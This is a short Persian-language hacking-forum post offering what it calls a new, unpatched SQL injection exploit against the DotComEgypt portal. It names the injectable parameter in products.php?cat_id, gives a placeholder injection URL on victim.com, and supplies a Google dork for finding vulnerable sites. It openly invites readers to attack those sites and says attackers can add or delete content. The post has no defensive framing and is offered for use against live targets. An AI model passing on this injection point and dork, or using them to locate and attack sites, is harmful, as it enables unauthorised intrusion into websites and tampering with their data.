برای شما یک اکسپلویت از پرتال DotComEgypt گذاشتم که می تونید ازش برای SQL کردن اونها استفاده کننید این باگ تازه پیدا شده و هنوز هم نسخه Fix شده ای اون نیستش .
Remote SQL injection Vulnerability
این آسیب پذیری در بخش موضوعات این سیستم پیدا شده که به وسیله ای اون می تونیم موضوع جدید به سایت اضافه کنیم و یا اینکه موضاعات رو هذف کنیم نوع شکل لینک موضوعات به شکل زیر است :
http://victim.com/products.php?cat_id
اکسپلویت :
www.victim.com/products.php?cat_id= “SQL”
گوگل :
Dork : "Powered by DotCom" "inurl:products.php?cat_id="
موفق باشید !